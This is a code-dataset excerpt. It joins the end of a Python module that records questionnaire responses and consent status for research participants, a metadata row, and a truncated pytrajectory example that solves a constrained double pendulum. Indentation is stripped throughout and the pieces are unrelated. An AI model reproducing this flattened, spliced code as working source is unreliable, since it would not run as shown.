new_session, questionnaire_response, code_ids, questions, questionnaire_history, resource_json
)
super(QuestionnaireResponseDao, self).insert_with_session(session, questionnaire_response)
# Mark existing answers for the questions in this response given previously by this participant
# as ended.
for answer in current_answers:
answer.endTime = questionnaire_response.created
session.merge(answer)
return questionnaire_response
def _get_field_value(self, field_type, answer):
if field_type == FieldType.CODE:
return answer.valueCodeId
if field_type == FieldType.STRING:
return answer.valueString
if field_type == FieldType.DATE:
return answer.valueDate
raise BadRequest(f"Don't know how to map field of type {field_type}")
def _update_field(self, participant_summary, field_name, field_type, answer):
value = getattr(participant_summary, field_name)
new_value = self._get_field_value(field_type, answer)
if new_value is not None and value != new_value:
setattr(participant_summary, field_name, new_value)
return True
return False
@staticmethod
def _find_cope_month(questionnaire_history: QuestionnaireHistory, response_authored_date):
cope_form_id_map = config.getSettingJson(config.COPE_FORM_ID_MAP)
for form_ids_str, month_name in cope_form_id_map.items():
if questionnaire_history.externalId in form_ids_str.split(','):
return month_name
# If the questionnaire identifier isn't in the COPE map then using response authored date as a fallback
logging.error('Unrecognized identifier for COPE survey response '
f'(questionnaire_id: "{questionnaire_history.questionnaireId}", '
f'version: "{questionnaire_history.version}", identifier: "{questionnaire_history.externalId}"')
if response_authored_date < datetime(2020, 6, 4):
return 'May'
elif response_authored_date < datetime(2020, 7, 1):
return 'June'
elif response_authored_date < datetime(2020, 10, 5):
return 'July'
elif response_authored_date < datetime(2020, 12, 5): # Nov scheduled to close on Dec 3rd
return 'Nov'
elif response_authored_date < datetime(2021, 2, 8): # Feb scheduled to open on Feb 9th
return 'Dec'
else:
return 'Feb'
def _update_participant_summary(
self, session, questionnaire_response, code_ids, questions, questionnaire_history, resource_json
):
"""Updates the participant summary based on questions answered and modules completed
in the questionnaire response.
If no participant summary exists already, only a response to the study enrollment consent
questionnaire can be submitted, and it must include first and last name and e-mail address.
"""
# Block on other threads modifying the participant or participant summary.
participant = ParticipantDao().get_for_update(session, questionnaire_response.participantId)
if participant is None:
raise BadRequest(f"Participant with ID {questionnaire_response.participantId} is not found.")
participant_summary = participant.participantSummary
authored = questionnaire_response.authored
# If authored is a datetime and has tzinfo, convert to utc and remove tzinfo.
# The authored timestamps in the participant summary will already be in utc, but lack tzinfo.
if authored and isinstance(authored, datetime) and authored.tzinfo:
authored = authored.astimezone(pytz.utc).replace(tzinfo=None)
code_ids.extend([concept.codeId for concept in questionnaire_history.concepts])
code_dao = CodeDao()
something_changed = False
module_changed = False
# If no participant summary exists, make sure this is the study enrollment consent.
if not participant_summary:
consent_code = code_dao.get_code(PPI_SYSTEM, CONSENT_FOR_STUDY_ENROLLMENT_MODULE)
if not consent_code:
raise BadRequest("No study enrollment consent code found; import codebook.")
if not consent_code.codeId in code_ids:
raise BadRequest(
f"Can't submit order for participant {questionnaire_response.participantId} without consent"
)
if not _validate_consent_pdfs(resource_json):
raise BadRequest(
f"Unable to find signed consent-for-enrollment file for participant"
)
participant_summary = ParticipantDao.create_summary_for_participant(participant)
something_changed = True
# Fetch the codes for all questions and concepts
codes = code_dao.get_with_ids(code_ids)
code_map = {code.codeId: code for code in codes if code.system == PPI_SYSTEM}
question_map = {question.questionnaireQuestionId: question for question in questions}
race_code_ids = []
gender_code_ids = []
ehr_consent = False
gror_consent = None
dvehr_consent = QuestionnaireStatus.SUBMITTED_NO_CONSENT
street_address_submitted = False
street_address2_submitted = False
# Set summary fields for answers that have questions with codes found in QUESTION_CODE_TO_FIELD
for answer in questionnaire_response.answers:
question = question_map.get(answer.questionId)
if question:
code = code_map.get(question.codeId)
if code:
if code.value == GENDER_IDENTITY_QUESTION_CODE:
gender_code_ids.append(answer.valueCodeId)
elif code.value == STREET_ADDRESS_QUESTION_CODE:
street_address_submitted = answer.valueString is not None
elif code.value == STREET_ADDRESS2_QUESTION_CODE:
street_address2_submitted = answer.valueString is not None
summary_field = QUESTION_CODE_TO_FIELD.get(code.value)
if summary_field:
if something_changed:
self._update_field(participant_summary, summary_field[0], summary_field[1], answer)
else:
something_changed = self._update_field(
participant_summary, summary_field[0], summary_field[1], answer
)
elif code.value == RACE_QUESTION_CODE:
race_code_ids.append(answer.valueCodeId)
elif code.value == DVEHR_SHARING_QUESTION_CODE:
code = code_dao.get(answer.valueCodeId)
if code and code.value == DVEHRSHARING_CONSENT_CODE_YES:
dvehr_consent = QuestionnaireStatus.SUBMITTED
elif code and code.value == DVEHRSHARING_CONSENT_CODE_NOT_SURE:
dvehr_consent = QuestionnaireStatus.SUBMITTED_NOT_SURE
elif code.value == EHR_CONSENT_QUESTION_CODE:
code = code_dao.get(answer.valueCodeId)
if participant_summary.ehrConsentExpireStatus == ConsentExpireStatus.EXPIRED and \
authored > participant_summary.ehrConsentExpireAuthored:
participant_summary.ehrConsentExpireStatus = ConsentExpireStatus.UNSET
participant_summary.ehrConsentExpireAuthored = None
participant_summary.ehrConsentExpireTime = None
if code and code.value == CONSENT_PERMISSION_YES_CODE:
ehr_consent = True
if participant_summary.consentForElectronicHealthRecordsFirstYesAuthored is None:
participant_summary.consentForElectronicHealthRecordsFirstYesAuthored = authored
if participant_summary.ehrConsentExpireStatus == ConsentExpireStatus.EXPIRED and \
authored < participant_summary.ehrConsentExpireAuthored:
ehr_consent = False
elif code.value == EHR_CONSENT_EXPIRED_QUESTION_CODE:
if answer.valueString and answer.valueString == EHR_CONSENT_EXPIRED_YES:
participant_summary.ehrConsentExpireStatus = ConsentExpireStatus.EXPIRED
participant_summary.ehrConsentExpireAuthored = authored
participant_summary.ehrConsentExpireTime = questionnaire_response.created
something_changed = True
elif code.value == CABOR_SIGNATURE_QUESTION_CODE:
if answer.valueUri or answer.valueString:
# TODO: validate the URI? [DA-326]
if not participant_summary.consentForCABoR:
participant_summary.consentForCABoR = True
participant_summary.consentForCABoRTime = questionnaire_response.created
participant_summary.consentForCABoRAuthored = authored
something_changed = True
elif code.value == GROR_CONSENT_QUESTION_CODE:
if code_dao.get(answer.valueCodeId).value == CONSENT_GROR_YES_CODE:
gror_consent = QuestionnaireStatus.SUBMITTED
elif code_dao.get(answer.valueCodeId).value == CONSENT_GROR_NO_CODE:
gror_consent = QuestionnaireStatus.SUBMITTED_NO_CONSENT
elif code_dao.get(answer.valueCodeId).value == CONSENT_GROR_NOT_SURE:
gror_consent = QuestionnaireStatus.SUBMITTED_NOT_SURE
elif code.value == COPE_CONSENT_QUESTION_CODE:
answer_value = code_dao.get(answer.valueCodeId).value
if answer_value == CONSENT_COPE_YES_CODE:
submission_status = QuestionnaireStatus.SUBMITTED
elif answer_value in [CONSENT_COPE_NO_CODE, CONSENT_COPE_DEFERRED_CODE]:
submission_status = QuestionnaireStatus.SUBMITTED_NO_CONSENT
else:
submission_status = QuestionnaireStatus.SUBMITTED_INVALID
month_name = self._find_cope_month(questionnaire_history, authored)
setattr(participant_summary, f'questionnaireOnCope{month_name}', submission_status)
setattr(participant_summary, f'questionnaireOnCope{month_name}Time',
questionnaire_response.created)
setattr(participant_summary, f'questionnaireOnCope{month_name}Authored', authored)
# COPE Survey changes need to update number of modules complete in summary
module_changed = True
elif code.value == PRIMARY_CONSENT_UPDATE_QUESTION_CODE:
answer_value = code_dao.get(answer.valueCodeId).value
if answer_value == COHORT_1_REVIEW_CONSENT_YES_CODE:
participant_summary.consentForStudyEnrollmentAuthored = authored
elif code.value == CONSENT_COHORT_GROUP_CODE:
try:
cohort_group = int(answer.valueString)
# Only checking that we know of the cohort group so we don't crash when
# storing in the Enum column
cohort_numbers = ParticipantCohort.numbers()
if cohort_group not in cohort_numbers:
raise ValueError
else:
participant_summary.consentCohort = answer.valueString
something_changed = True
except ValueError:
logging.error(f'Invalid value given for cohort group: received "{answer.valueString}"')
# If the answer for line 2 of the street address was left out then it needs to be clear on summary.
# So when it hasn't been submitted and there is something set for streetAddress2 we want to clear it out.
summary_has_street_line_two = participant_summary.streetAddress2 is not None \
and participant_summary.streetAddress2 != ""
if street_address_submitted and not street_address2_submitted and summary_has_street_line_two:
something_changed = True
participant_summary.streetAddress2 = None
# If race was provided in the response in one or more answers, set the new value.
if race_code_ids:
race_codes = [code_dao.get(code_id) for code_id in race_code_ids]
race = get_race(race_codes)
if race != participant_summary.race:
participant_summary.race = race
something_changed = True
if gender_code_ids:
gender_codes = [code_dao.get(code_id) for code_id in gender_code_ids]
gender = get_gender_identity(gender_codes)
if gender != participant_summary.genderIdentity:
participant_summary.genderIdentity = gender
something_changed = True
dna_program_consent_update_code = config.getSettingJson(config.DNA_PROGRAM_CONSENT_UPDATE_CODE, None)
# Set summary fields to SUBMITTED for questionnaire concepts that are found in
# QUESTIONNAIRE_MODULE_CODE_TO_FIELD
for concept in questionnaire_history.concepts:
code = code_map.get(concept.codeId)
if code:
summary_field = QUESTIONNAIRE_MODULE_CODE_TO_FIELD.get(code.value)
if summary_field:
new_status = QuestionnaireStatus.SUBMITTED
if code.value == CONSENT_FOR_ELECTRONIC_HEALTH_RECORDS_MODULE and not ehr_consent:
new_status = QuestionnaireStatus.SUBMITTED_NO_CONSENT
elif code.value == CONSENT_FOR_DVEHR_MODULE:
new_status = dvehr_consent
elif code.value == CONSENT_FOR_GENOMICS_ROR_MODULE:
if gror_consent is None:
raise BadRequest(
"GROR Consent answer is required to match code {}."
.format([CONSENT_GROR_YES_CODE, CONSENT_GROR_NO_CODE, CONSENT_GROR_NOT_SURE])
)
new_status = gror_consent
elif code.value == CONSENT_FOR_STUDY_ENROLLMENT_MODULE:
participant_summary.semanticVersionForPrimaryConsent = \
questionnaire_response.questionnaireSemanticVersion
if participant_summary.consentCohort is None or \
participant_summary.consentCohort == ParticipantCohort.UNSET:
if participant_summary.participantOrigin == 'vibrent':
logging.warning(f'Missing expected consent cohort information for participant '
f'{participant_summary.participantId}')
if authored >= PARTICIPANT_COHORT_3_START_TIME:
participant_summary.consentCohort = ParticipantCohort.COHORT_3
elif PARTICIPANT_COHORT_2_START_TIME <= authored < PARTICIPANT_COHORT_3_START_TIME:
participant_summary.consentCohort = ParticipantCohort.COHORT_2
elif authored < PARTICIPANT_COHORT_2_START_TIME:
participant_summary.consentCohort = ParticipantCohort.COHORT_1
if participant_summary.consentForStudyEnrollmentFirstYesAuthored is None:
participant_summary.consentForStudyEnrollmentFirstYesAuthored = authored
# set language of consent to participant summary
for extension in resource_json.get("extension", []):
if (
extension.get("url") == _LANGUAGE_EXTENSION
and extension.get("valueCode") in LANGUAGE_OF_CONSENT
):
if participant_summary.primaryLanguage != extension.get("valueCode"):
participant_summary.primaryLanguage = extension.get("valueCode")
something_changed = True
break
elif (
extension.get("url") == _LANGUAGE_EXTENSION
and extension.get("valueCode") not in LANGUAGE_OF_CONSENT
):
logging.warning(f"consent language {extension.get('valueCode')} not recognized.")
if getattr(participant_summary, summary_field) != new_status:
setattr(participant_summary, summary_field, new_status)
setattr(participant_summary, summary_field + "Time", questionnaire_response.created)
setattr(participant_summary, summary_field + "Authored", authored)
something_changed = True
module_changed = True
elif dna_program_consent_update_code is not None and code.value == dna_program_consent_update_code:
# If we receive a questionnaire response it means they've viewed the update and we should mark
# them as submitted
participant_summary.questionnaireOnDnaProgram = QuestionnaireStatus.SUBMITTED
participant_summary.questionnaireOnDnaProgramAuthored = authored
elif code.value == COPE_VACCINE_MINUTE_1_MODULE_CODE \
and participant_summary.questionnaireOnCopeVaccineMinute1 != QuestionnaireStatus.SUBMITTED:
participant_summary.questionnaireOnCopeVaccineMinute1 = QuestionnaireStatus.SUBMITTED
participant_summary.questionnaireOnCopeVaccineMinute1Authored = authored
module_changed = True
if module_changed:
participant_summary.numCompletedBaselinePPIModules = count_completed_baseline_ppi_modules(
participant_summary
)
participant_summary.baselineQuestionnairesFirstCompleteAuthored = get_first_completed_baseline_time(
participant_summary
)
participant_summary.numCompletedPPIModules = count_completed_ppi_modules(participant_summary)
if something_changed:
first_last = (participant_summary.firstName, participant_summary.lastName)
email_phone = (participant_summary.email, participant_summary.loginPhoneNumber)
if not all(first_last):
raise BadRequest(
"First name ({:s}), and last name ({:s}) required for consenting."
.format(*["present" if part else "missing" for part in first_last])
)
if not any(email_phone):
raise BadRequest(
"Email address ({:s}), or phone number ({:s}) required for consenting."
.format(*["present" if part else "missing" for part in email_phone])
)
ParticipantSummaryDao().update_enrollment_status(participant_summary)
participant_summary.lastModified = clock.CLOCK.now()
session.merge(participant_summary)
# switch account to test account if the phone number starts with 4442
# this is a requirement from PTSC
ph = getattr(participant_summary, 'loginPhoneNumber') or \
getattr(participant_summary, 'phoneNumber') or 'None'
ph_clean = re.sub('[\(|\)|\-|\s]', '', ph)
if ph_clean.startswith(TEST_LOGIN_PHONE_NUMBER_PREFIX):
ParticipantDao().switch_to_test_account(session, participant)
# update participant gender/race answers table
if race_code_ids:
participant_race_answer_dao = ParticipantRaceAnswersDao()
participant_race_answer_dao.update_race_answers_with_session(
session, participant.participantId, race_code_ids
)
if gender_code_ids:
participant_gender_race_dao = ParticipantGenderAnswersDao()
participant_gender_race_dao.update_gender_answers_with_session(
session, participant.participantId, gender_code_ids
)
def insert(self, obj):
if obj.questionnaireResponseId:
return super(QuestionnaireResponseDao, self).insert(obj)
return self._insert_with_random_id(obj, ["questionnaireResponseId"])
def read_status(self, fhir_response: fhir_questionnaireresponse.QuestionnaireResponse):
status_map = {
'in-progress': QuestionnaireResponseStatus.IN_PROGRESS,
'completed': QuestionnaireResponseStatus.COMPLETED,
'amended': QuestionnaireResponseStatus.AMENDED,
'entered-in-error': QuestionnaireResponseStatus.ENTERED_IN_ERROR,
'stopped': QuestionnaireResponseStatus.STOPPED
}
if fhir_response.status not in status_map:
raise BadRequest(f'Unrecognized status "{fhir_response.status}"')
else:
return status_map[fhir_response.status]
@classmethod
def calculate_answer_hash(cls, response_json):
answer_list_json = response_json.get('group', '')
answer_list_str = json.dumps(answer_list_json)
return md5(answer_list_str.encode('utf-8')).hexdigest()
@classmethod
def _extension_from_fhir_object(cls, fhir_extension):
# Get the non-empty values from the FHIR extension object for the url field and
# any field with a name that starts with "value"
fhir_fields = fhir_extension.__dict__
filtered_values = {}
for name, value in fhir_fields.items():
if value is not None and (name == 'url' or name.startswith('value')):
filtered_values[name] = value
return QuestionnaireResponseExtension(**filtered_values)
@classmethod
def _parse_external_identifier(cls, fhir_qr):
external_id = None
if fhir_qr.identifier:
external_id = fhir_qr.identifier.value
if external_id and len(external_id) > QuestionnaireResponse.externalId.type.length:
logging.warning('External id was larger than expected, unable to save it to the database.')
external_id = None
return external_id
@classmethod
def extension_models_from_fhir_objects(cls, fhir_extensions):
if fhir_extensions:
try:
return [cls._extension_from_fhir_object(extension) for extension in fhir_extensions]
except TypeError:
logging.warning('Unexpected extension value', exc_info=True)
return []
else:
return []
def from_client_json(self, resource_json, participant_id=None, client_id=None):
# pylint: disable=unused-argument
# Parse the questionnaire response, but preserve the original response when persisting
fhir_qr = fhir_questionnaireresponse.QuestionnaireResponse(resource_json)
patient_id = fhir_qr.subject.reference
if patient_id != "Patient/P{}".format(participant_id):
msg = "Questionnaire response subject reference does not match participant_id {}"
raise BadRequest(msg.format(participant_id))
questionnaire = self._get_questionnaire(fhir_qr.questionnaire, resource_json)
if questionnaire.status == QuestionnaireDefinitionStatus.INVALID:
raise BadRequest(
f"Submitted questionnaire that is marked as invalid: questionnaire ID {questionnaire.questionnaireId}"
)
authored = None
if fhir_qr.authored and fhir_qr.authored.date:
authored = fhir_qr.authored.date
language = None
non_participant_author = None
if fhir_qr.extension:
for ext in fhir_qr.extension:
if "iso21090-ST-language" in ext.url:
language = ext.valueCode[:2]
if ext.url == _CATI_EXTENSION:
non_participant_author = ext.valueString
qr = QuestionnaireResponse(
questionnaireId=questionnaire.questionnaireId,
questionnaireVersion=questionnaire.version,
questionnaireSemanticVersion=questionnaire.semanticVersion,
participantId=participant_id,
nonParticipantAuthor=non_participant_author,
authored=authored,
language=language,
resource=json.dumps(resource_json),
status=self.read_status(fhir_qr),
answerHash=self.calculate_answer_hash(resource_json),
externalId=self._parse_external_identifier(fhir_qr)
)
if fhir_qr.group is not None:
# Extract a code map and answers from the questionnaire response.
code_map, answers = self._extract_codes_and_answers(fhir_qr.group, questionnaire)
if not answers:
logging.error("No answers from QuestionnaireResponse JSON. This is harmless but probably an error.")
# Get or insert codes, and retrieve their database IDs.
code_id_map = CodeDao().get_internal_id_code_map(code_map)
# Now add the child answers, using the IDs in code_id_map
self._add_answers(qr, code_id_map, answers)
qr.extensions = self.extension_models_from_fhir_objects(fhir_qr.extension)
return qr
@staticmethod
def _get_questionnaire(questionnaire, resource_json):
"""Retrieves the questionnaire referenced by this response; mutates the resource JSON to include
the version if it doesn't already.
If a questionnaire has a history element it goes into the if block here."""
# if history...
if not questionnaire.reference.startswith(_QUESTIONNAIRE_PREFIX):
raise BadRequest(f"Questionnaire reference {questionnaire.reference} is invalid")
questionnaire_reference = questionnaire.reference[len(_QUESTIONNAIRE_PREFIX):]
# If the questionnaire response specifies the version of the questionnaire it's for, use it.
if _QUESTIONNAIRE_HISTORY_SEGMENT in questionnaire_reference:
questionnaire_ref_parts = questionnaire_reference.split(_QUESTIONNAIRE_HISTORY_SEGMENT)
if len(questionnaire_ref_parts) != 2:
raise BadRequest(f"Questionnaire id {questionnaire_reference} is invalid")
try:
questionnaire_id = int(questionnaire_ref_parts[0])
semantic_version = questionnaire_ref_parts[1]
q = QuestionnaireHistoryDao().get_with_children((questionnaire_id, semantic_version))
if not q:
raise BadRequest(f"Questionnaire with id {questionnaire_id}, semantic version {semantic_version} "
f"is not found")
return q
except ValueError:
raise BadRequest(f"Questionnaire id {questionnaire_reference} is invalid")
else:
# if no questionnaire/history...
try:
questionnaire_id = int(questionnaire_reference)
from rdr_service.dao.questionnaire_dao import QuestionnaireDao
q = QuestionnaireDao().get_with_children(questionnaire_id)
if not q:
raise BadRequest(f"Questionnaire with id {questionnaire_id} is not found")
# Mutate the questionnaire reference to include the version.
questionnaire_reference = _QUESTIONNAIRE_REFERENCE_FORMAT.format(questionnaire_id, q.semanticVersion)
resource_json["questionnaire"]["reference"] = questionnaire_reference
return q
except ValueError:
raise BadRequest(f"Questionnaire id {questionnaire_reference} is invalid")
@classmethod
def _extract_codes_and_answers(cls, group, q):
"""Returns (system, code) -> (display, code type, question code id) code map
and (QuestionnaireResponseAnswer, (system, code)) answer pairs.
"""
code_map = {}
answers = []
link_id_to_question = {}
if q.questions:
link_id_to_question = {question.linkId: question for question in q.questions}
cls._populate_codes_and_answers(group, code_map, answers, link_id_to_question, q.questionnaireId)
return (code_map, answers)
@classmethod
def _populate_codes_and_answers(cls, group, code_map, answers, link_id_to_question, questionnaire_id):
"""Populates code_map with (system, code) -> (display, code type, question code id)
and answers with (QuestionnaireResponseAnswer, (system, code)) pairs."""
if group.question:
for question in group.question:
if question.linkId and question.answer:
qq = link_id_to_question.get(question.linkId)
if qq:
for answer in question.answer:
qr_answer = QuestionnaireResponseAnswer(questionId=qq.questionnaireQuestionId)
system_and_code = None
ignore_answer = False
if answer.valueCoding:
if not answer.valueCoding.system:
raise BadRequest(f"No system provided for valueCoding: {question.linkId}")
if not answer.valueCoding.code:
raise BadRequest(f"No code provided for valueCoding: {question.linkId}")
if answer.valueCoding.system == PPI_EXTRA_SYSTEM:
# Ignore answers from the ppi-extra system, as they aren't used for analysis.
ignore_answer = True
else:
system_and_code = (answer.valueCoding.system, answer.valueCoding.code)
if not system_and_code in code_map:
code_map[system_and_code] = (
answer.valueCoding.display,
CodeType.ANSWER,
qq.codeId,
)
if not ignore_answer:
if answer.valueDecimal is not None:
qr_answer.valueDecimal = answer.valueDecimal
if answer.valueInteger is not None:
qr_answer.valueInteger = answer.valueInteger
if answer.valueString is not None:
answer_length = len(answer.valueString)
max_length = QuestionnaireResponseAnswer.VALUE_STRING_MAXLEN
if answer_length > max_length:
raise BadRequest(
f"String value too long (len={answer_length}); "
f"must be less than {max_length}"
)
qr_answer.valueString = answer.valueString
if answer.valueDate is not None:
qr_answer.valueDate = answer.valueDate.date
if answer.valueDateTime is not None:
qr_answer.valueDateTime = answer.valueDateTime.date
if answer.valueBoolean is not None:
qr_answer.valueBoolean = answer.valueBoolean
if answer.valueUri is not None:
qr_answer.valueUri = answer.valueUri
answers.append((qr_answer, system_and_code))
if answer.group:
for sub_group in answer.group:
cls._populate_codes_and_answers(
sub_group, code_map, answers, link_id_to_question, questionnaire_id
)
if group.group:
for sub_group in group.group:
cls._populate_codes_and_answers(sub_group, code_map, answers, link_id_to_question, questionnaire_id)
@staticmethod
def _add_answers(qr, code_id_map, answers):
for answer, system_and_code in answers:
if system_and_code:
system, code = system_and_code
answer.valueCodeId = code_id_map.get(system, code)
qr.answers.append(answer)
def _validate_consent_pdfs(resource):
"""Checks for any consent-form-signed-pdf extensions and validates their PDFs in GCS."""
if resource.get("resourceType") != "QuestionnaireResponse":
raise ValueError(f'Expected QuestionnaireResponse for "resourceType" in {resource}.')
# We now lookup up consent bucket names by participant origin id.
p_origin = get_account_origin_id()
consent_bucket_config = config.getSettingJson(config.CONSENT_PDF_BUCKET)
# If we don't match the origin id, just return the first bucket in the dict.
try:
consent_bucket = consent_bucket_config.get(p_origin, consent_bucket_config[next(iter(consent_bucket_config))])
except AttributeError:
pass
found_pdf = False
for extension in resource.get("extension", []):
if extension["url"] != _SIGNED_CONSENT_EXTENSION:
continue
local_pdf_path = extension["valueString"]
_, ext = os.path.splitext(local_pdf_path)
if ext.lower() != ".pdf":
raise BadRequest(f"Signed PDF must end in .pdf, found {ext} (from {local_pdf_path}).")
# Treat the value as a bucket-relative path, allowing a leading slash or not.
if not local_pdf_path.startswith("/"):
local_pdf_path = "/" + local_pdf_path
_raise_if_gcloud_file_missing("/{}{}".format(consent_bucket, local_pdf_path))
found_pdf = True
if config.GAE_PROJECT == 'localhost' or is_self_request():
# Pretend we found a valid consent if we're running on a development machine
# skip checking for self request from fake participant generating
return True
else:
return found_pdf
def _raise_if_gcloud_file_missing(path):
"""Checks that a GCS file exists.
Args:
path: An absolute Google Cloud Storage path, starting with /$BUCKET/.
Raises:
BadRequest if the path does not reference a file.
"""
storage_provier = storage.get_storage_provider()
if not storage_provier.exists(path):
raise BadRequest(f"Google Cloud Storage file not found in {path}.")
class QuestionnaireResponseAnswerDao(BaseDao):
def __init__(self):
super(QuestionnaireResponseAnswerDao, self).__init__(QuestionnaireResponseAnswer)
def get_id(self, obj):
return obj.questionnaireResponseAnswerId
def get_current_answers_for_concepts(self, session, participant_id, code_ids):
"""Return any answers the participant has previously given to questions with the specified
code IDs."""
if not code_ids:
return []
return (
session.query(QuestionnaireResponseAnswer)
.join(QuestionnaireResponse)
.join(QuestionnaireQuestion)
.filter(QuestionnaireResponse.participantId == participant_id)
.filter(QuestionnaireResponseAnswer.endTime == None)
.filter(QuestionnaireQuestion.codeId.in_(code_ids))
.all()
)
|
bsd-3-clause
| 193,286,261,942,352,830
| 52.594189
| 120
| 0.611594
| false
| 4.392089
| true
| false
| false
|
akunze3/pytrajectory
|
examples/ex8_ConstrainedDoublePendulum.py
|
1
|
8675
|
# constrained double pendulum
# import all we need for solving the problem
from pytrajectory import ControlSystem
import numpy as np
import sympy as sp
from sympy import cos, sin, Matrix
from numpy import pi
# to define a callable function that returns the vectorfield
# we first solve the motion equations of form Mx = B
def solve_motion_equations(M, B, state_vars=[], input_vars=[], parameters_values=dict()):
'''
Solves the motion equations given by the mass matrix and right hand side
to define a callable function for the vector field of the respective
control system.
Parameters
----------
M : sympy.Matrix
A sympy.Matrix containing sympy expressions and symbols that represents
the mass matrix of the control system.
B : sympy.Matrix
A sympy.Matrix containing sympy expressions and symbols that represents
the right hand site of the motion equations.
state_vars : list
A list with sympy.Symbols's for each state variable.
input_vars : list
A list with sympy.Symbols's for each input variable.
parameter_values : dict
A dictionary with a key:value pair for each system parameter.
Returns
-------
callable
'''
M_shape = M.shape
B_shape = B.shape
assert(M_shape[0] == B_shape[0])
# at first we create a buffer for the string that we complete and execute
# to dynamically define a function and return it
fnc_str_buffer ='''
def f(x, u):
# System variables
%s # x_str
%s # u_str
# Parameters
%s # par_str
# Sympy Common Expressions
%s # cse_str
# Vectorfield
%s # ff_str
return ff
'''
#################################
# handle system state variables #
#################################
# --> leads to x_str which shows how to unpack the state variables
x_str = ''
for var in state_vars:
x_str += '%s, '%str(var)
# as a last we remove the trailing '; ' to avoid syntax erros
x_str = x_str + '= x'
##########################
# handle input variables #
##########################
# --> leads to u_str which will show how to unpack the inputs of the control system
u_str = ''
for var in input_vars:
u_str += '%s, '%str(var)
# after we remove the trailing '; ' to avoid syntax errors x_str will look like:
# 'u1, u2, ... , um = u'
u_str = u_str + '= u'
############################
# handle system parameters #
############################
# --> leads to par_str
par_str = ''
for k, v in parameters_values.items():
# 'k' is the name of a system parameter such as mass or gravitational acceleration
# 'v' is its value in SI units
par_str += '%s = %s; '%(str(k), str(v))
# as a last we remove the trailing '; ' from par_str to avoid syntax errors
par_str = par_str[:-2]
# now solve the motion equations w.r.t. the accelerations
sol = M.solve(B)
# use SymPy's Common Subexpression Elimination
cse_list, cse_res = sp.cse(sol, symbols=sp.numbered_symbols('q'))
################################
# handle common subexpressions #
################################
# --> leads to cse_str
cse_str = ''
#cse_list = [(str(l), str(r)) for l, r in cse_list]
for cse_pair in cse_list:
cse_str += '%s = %s; '%(str(cse_pair[0]), str(cse_pair[1]))
# add result of cse
for i in xrange(M_shape[0]):
cse_str += 'q%d_dd = %s; '%(i, str(cse_res[0][i]))
cse_str = cse_str[:-2]
######################
# create vectorfield #
######################
# --> leads to ff_str
ff_str = 'ff = ['
for i in xrange(M_shape[0]):
ff_str += '%s, '%str(state_vars[2*i+1])
ff_str += 'q%s_dd, '%(i)
# remove trailing ',' and add closing brackets
ff_str = ff_str[:-2] + ']'
############################
# Create callable function #
############################
# now we can replace all placeholders in the function string buffer
fnc_str = fnc_str_buffer%(x_str, u_str, par_str, cse_str, ff_str)
# and finally execute it which will create a python function 'f'
exec(fnc_str)
# now we have defined a callable function that can be used within PyTrajectory
return f
# system and input variables
state_vars = sp.symbols('x, dx, phi1, dphi1, phi2, dphi2')
input_vars = sp.symbols('F,')
x, dx, phi1, dphi1, phi2, dphi2 = state_vars
F, = input_vars
# parameters
l1 = 0.25 # 1/2 * length of the pendulum 1
l2 = 0.25 # 1/2 * length of the pendulum
m1 = 0.1 # mass of the pendulum 1
m2 = 0.1 # mass of the pendulum 2
m = 1.0 # mass of the car
g = 9.81 # gravitational acceleration
I1 = 4.0/3.0 * m1 * l1**2 # inertia 1
I2 = 4.0/3.0 * m2 * l2**2 # inertia 2
param_values = {'l1':l1, 'l2':l2, 'm1':m1, 'm2':m2, 'm':m, 'g':g, 'I1':I1, 'I2':I2}
# mass matrix
M = Matrix([[ m+m1+m2, (m1+2*m2)*l1*cos(phi1), m2*l2*cos(phi2)],
[(m1+2*m2)*l1*cos(phi1), I1+(m1+4*m2)*l1**2, 2*m2*l1*l2*cos(phi2-phi1)],
[ m2*l2*cos(phi2), 2*m2*l1*l2*cos(phi2-phi1), I2+m2*l2**2]])
# and right hand site
B = Matrix([[ F + (m1+2*m2)*l1*sin(phi1)*dphi1**2 + m2*l2*sin(phi2)*dphi2**2 ],
[ (m1+2*m2)*g*l1*sin(phi1) + 2*m2*l1*l2*sin(phi2-phi1)*dphi2**2 ],
[ m2*g*l2*sin(phi2) + 2*m2*l1*l2*sin(phi1-phi2)*dphi1**2 ]])
f = solve_motion_equations(M, B, state_vars, input_vars)
# then we specify all boundary conditions
a = 0.0
xa = [0.0, 0.0, pi, 0.0, pi, 0.0]
b = 4.0
xb = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
ua = [0.0]
ub = [0.0]
# here we specify the constraints for the velocity of the car
con = {0 : [-1.0, 1.0],
1 : [-2.0, 2.0]}
# now we create our Trajectory object and alter some method parameters via the keyword arguments
S = ControlSystem(f, a, b, xa, xb, ua, ub, constraints=con,
eps=2e-1, su=20, kx=2, use_chains=False,
use_std_approach=False)
# time to run the iteration
x, u = S.solve()
# the following code provides an animation of the system above
# for a more detailed explanation have a look at the 'Visualisation' section in the documentation
import sys
import matplotlib as mpl
from pytrajectory.visualisation import Animation
def draw(xt, image):
x = xt[0]
phi1 = xt[2]
phi2 = xt[4]
car_width = 0.05
car_heigth = 0.02
rod_length = 2.0 * 0.25
pendulum_size = 0.015
x_car = x
y_car = 0
x_pendulum1 = x_car + rod_length * sin(phi1)
y_pendulum1 = rod_length * cos(phi1)
x_pendulum2 = x_pendulum1 + rod_length * sin(phi2)
y_pendulum2 = y_pendulum1 + rod_length * cos(phi2)
# create image
pendulum1 = mpl.patches.Circle(xy=(x_pendulum1, y_pendulum1), radius=pendulum_size, color='black')
pendulum2 = mpl.patches.Circle(xy=(x_pendulum2, y_pendulum2), radius=pendulum_size, color='black')
car = mpl.patches.Rectangle((x_car-0.5*car_width, y_car-car_heigth), car_width, car_heigth,
fill=True, facecolor='grey', linewidth=2.0)
joint = mpl.patches.Circle((x_car,0), 0.005, color='black')
rod1 = mpl.lines.Line2D([x_car,x_pendulum1], [y_car,y_pendulum1],
color='black', zorder=1, linewidth=2.0)
rod2 = mpl.lines.Line2D([x_pendulum1,x_pendulum2], [y_pendulum1,y_pendulum2],
color='black', zorder=1, linewidth=2.0)
# add the patches and lines to the image
image.patches.append(pendulum1)
image.patches.append(pendulum2)
image.patches.append(car)
image.patches.append(joint)
image.lines.append(rod1)
image.lines.append(rod2)
# and return the image
return image
if not 'no-pickle' in sys.argv:
# here we save the simulation results so we don't have to run
# the iteration again in case the following fails
S.save(fname='ex8_ConstrainedDoublePendulum.pcl')
if 'plot' in sys.argv or 'animate' in sys.argv:
# create Animation object
A = Animation(drawfnc=draw, simdata=S.sim_data,
